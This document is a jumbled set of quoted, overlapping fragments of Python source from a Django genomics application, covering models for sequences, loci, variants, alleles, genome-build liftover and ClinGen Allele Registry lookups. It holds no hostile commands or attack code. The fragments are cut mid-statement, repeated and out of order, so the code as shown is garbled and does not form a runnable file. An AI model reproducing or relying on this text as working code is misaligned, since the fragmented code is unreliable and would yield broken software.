"self.get_allele_source().get_allele_qs() def complete(self): self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source =",
"variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None",
"from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver",
"va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy",
"= format_chrom(chrom, want_chr) return chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant,",
"return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self)",
"It's a bug to have the same 3 variant/build/allele so we can add",
"canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first():",
"va = vas.first() if va: return va.variant raise ValueError(f'Could not find any variants",
"def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence is standard [GATCN] (ie not",
"on_delete=DO_NOTHING) # handled via drop partition variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\"",
"snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the other build",
"try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors",
"return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length",
"self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length !=",
"__str__(self): source = \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover",
"= models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\" We",
"settings.LIFTOVER_DBSNP_ENABLED: va = self.variantallele_set.all().first() if va is None: raise ValueError(\"Allele contains no VariantAlleles",
"(API call) If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple()",
"format_spec == 'CA' and (cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\"",
"alt') class Sequence(models.Model): \"\"\" We want to guarantee seq is unique (so Locus/Variant",
"return self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\"",
"get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def",
"self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all():",
"-> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist:",
"of Variants So don't want them on the Variant object - instead do",
"\"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\"",
"return None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele:",
"qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\" return not",
"class Sequence(models.Model): \"\"\" We want to guarantee seq is unique (so Locus/Variant can",
"Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild,",
"that requires installing the btree_gist extension (requires postgres Admin rights). Django 3 has",
"v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if",
"Admin rights). Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via",
"return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection =",
"then creating VariantAllele entries for the variant/allele Some AlleleConversionTools (eg ClinGen AlleleRegistry) we",
"build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\"",
"Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) ->",
"loci in the build being used by ClinGen) - but it's not likely.",
"django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils",
"Gist indexes but that requires installing the btree_gist extension (requires postgres Admin rights).",
"can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq,",
"if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if",
"= [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count =",
"a VCF where ID is set to Allele.pk and then creating VariantAllele entries",
"possible solution is to use Gist indexes but that requires installing the btree_gist",
"the row) There is only 1 Variant for a given locus/alt per database",
"self.error: # Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True",
"bool: \"\"\" Variant alt sequence is standard [GATCN] (ie not special or reference)",
"file (multiple Variants with different alt alleles point to the same locus) There",
"= genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version := self.varianttranscriptannotation_set.filter(version=vav).first():",
"'Variant': vas = self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if",
"def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool:",
"if the other build shares existing contig genome_build_contigs = set(c.pk for c in",
"can_merge: if other_clingen_allele: # Move across ClinGen Allele (may not have been possible",
"import Q, FilteredRelation from django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models",
"variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple()",
"full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref,",
"to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return",
"if va: return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele =",
"collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline",
"if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele,",
"!= self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length",
"alt or alt == '.' @property def is_reference(self) -> bool: return self.alt.seq ==",
"the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool =",
"@staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict",
"models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq)",
"exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs",
"format_chrom from library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types",
"It's possible for multiple variants from the same genome build to resolve to",
"variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except",
"regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except",
"**dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build",
"best_attempt=False) except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self,",
"There is only 1 Variant for a given locus/alt per database (handled via",
"If you know a VariantAllele exists for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from",
"seq is unique (so Locus/Variant can have unique constraints) Postgres by default uses",
"@lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name,",
"If False does not check for missing representations \"\"\" if liftover_complete: v37 =",
"{self.get_status_display()} != SUCCESS\") return Q(**{f\"{self.variant_collection_alias}__isnull\": False}) def __str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class",
"= \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status =",
"- deleting this one\", va.allele, va.genome_build, va.variant) va.delete() return can_merge @property def build_names(self)",
"have the same 3 variant/build/allele so we can add that unique_together constraint We",
"null=True, on_delete=CASCADE) # Optional, if got a variant but invalid error_message = models.TextField()",
"a given chrom/position/ref per database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig,",
"None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: #",
"build {genome_build}') if not va: va = vas.first() if va: return va.variant raise",
"get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status !=",
"\"\"\" Query handling indels. Contigs must match and variant.start <= end AND variant.end_position",
"super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int = 20): if",
"and self.allele.clingen_allele is None: if self.error: # Retry if server was down return",
"c in genome_build.chrom_contig_mappings.values()) for variant_allele in self.variantallele_set.all(): if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool =",
"'VariantCoordinate']: \"\"\" Used by to write VCF coordinates during liftover. Can be slow",
"it's not likely. It's a bug to have the same 3 variant/build/allele so",
"va = vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise ValueError(f'Could not find",
"\" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover = models.ForeignKey(Liftover, on_delete=CASCADE)",
"abbreviate(s: str, max_length: int = 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\"",
"large TextFields give error of: \"index row requires x bytes, maximum size is",
"\".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\"",
"def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy",
"from django_extensions.db.models import TimeStampedModel from lazy import lazy from model_utils.managers import InheritanceManager from",
"Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref,",
"pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, {",
"@lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None",
"return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If",
"import lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from",
"other build shares existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for",
"FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va := self.variantallele_set.filter(error__isnull=False).first():",
"def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele",
"from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation",
"snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus",
"> self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or self.is_reference @property def",
"multiple variants from the same genome build to resolve to the same allele",
"Variant object - instead do 1-to-1 \"\"\" # Some builds share contigs (eg",
"variants for same change point to same allele This is generally done via",
"def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome build \"\"\" return",
"!= Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant",
"do 1-to-1 \"\"\" # Some builds share contigs (eg GRCh37/38 share MT and",
"models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the same",
"return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must",
"on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the same genome",
"loci in a genome build being represented by 1 loci in the build",
"\"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True)",
"This is generally done via ClinGen Allele Registry, but sometimes that can fail.",
"to use Gist indexes but that requires installing the btree_gist extension (requires postgres",
"re from typing import Optional, Pattern, Tuple, Iterable, Set import django.dispatch from django.conf",
"regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have 4",
"= self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all subclass",
"= Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}'",
"(cligen_allele := self.clingen_allele): return str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\"",
"= None if self.clingen_allele: try: g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError:",
"if variant_allele.variant.locus.contig_id in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple",
"- but it's not likely. It's a bug to have the same 3",
"not va: va = vas.first() if va: return va.variant raise ValueError(f'Could not find",
"[\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']:",
"with different alt alleles point to the same locus) There is only 1",
"@property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None:",
"self.variantallele_set.order_by(\"genome_build__name\") @lazy def grch37(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return",
"if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False def",
"return va.variant raise ValueError(f'Could not find any variants in allele {self.id}') def get_liftover_variant_tuple(self,",
"f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) ->",
"self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs",
"both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele:",
"V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) ->",
"VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod",
"reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va:",
"name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property def",
"8191\" The easiest solution is to md5sum seq and make the constraint on",
"Contigs must match and variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs",
"your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple",
"usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\"",
"other_clingen_allele and self.clingen_allele: can_merge = False merge_log_message = f\"Error performing {merge_log_message}: both have",
"liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the end of a liftover",
"check for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first()",
"from django.conf import settings from django.contrib.auth.models import User from django.db import models, IntegrityError",
"allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to",
"solution is to use Gist indexes but that requires installing the btree_gist extension",
"qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\" only contains G/A/T/C/N \"\"\"",
"return chrom, position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel):",
"'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def",
"models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on",
"import User from django.db import models, IntegrityError from django.db.models import Value as V,",
"other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self)",
"output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if",
"return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model):",
"get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele",
"self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return",
"Some AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the desired",
"already been created - allele_source used to retrieve them The VCF (in genome_build",
"django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest from",
"alt) \"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position, ref, alt",
"per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return",
"3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration \"\"\" seq",
"str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has",
"flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try:",
"import models, IntegrityError from django.db.models import Value as V, QuerySet, F from django.db.models.deletion",
"bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def",
"import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import",
"pipeline involves reading through a VCF where ID is set to Allele.pk and",
"> max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def",
"flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import",
"coordinates during liftover. Can be slow (API call) If you know a VariantAllele",
"self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def",
"to store Alleles for a small fraction of Variants So don't want them",
"any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build): c_hgvs =",
"user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf",
"models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if there is one,",
"models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom)",
"InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from",
"rights). Django 3 has ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration",
"return name def __format__(self, format_spec: str): if format_spec == 'CA' and (cligen_allele :=",
"independent - ie GRCh37 and GRCh38 variants for same change point to same",
"Allele Registry, but sometimes that can fail. Linked against Variant with VariantAllele below",
"return self.locus.contig.name, self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy def",
"be slow (API call) If you know a VariantAllele exists for your build,",
"-> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self):",
"ExclusionConstraint, Postgres contrib has BtreeGistExtension to add via migration \"\"\" seq = models.TextField()",
"conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen Allele (may",
"in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele",
"can't have another, so it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele",
"liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True)",
"Liftover pipeline involves reading through a VCF where ID is set to Allele.pk",
"= models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf =",
"position, ref, alt) \"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position,",
"canonical=True).first() def get_best_variant_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav,",
"on_delete=CASCADE) def get_absolute_url(self): # will show allele if there is one, otherwise go",
"to same allele This is generally done via ClinGen Allele Registry, but sometimes",
"write the VCF in the desired genome build For others (NCBI Remap) we",
"def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to",
"return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first()",
"models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True)",
"contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus",
"django.contrib.auth.models import User from django.db import models, IntegrityError from django.db.models import Value as",
"snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums",
"a VCF file (multiple Variants with different alt alleles point to the same",
"f\"{self.chrom}:{self.position} {self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles at a locus",
"def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position,",
":= self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build):",
"genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params,",
"Sequence.abbreviate(alt) return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] =",
"Greatest from django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import",
"Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def",
"in all builds, but at least one # links there, and can't have",
"on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) -> AlleleSource: \"\"\"",
"\"\"\" Keep track of calls to Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE)",
"raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version)",
"False does not check for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first()",
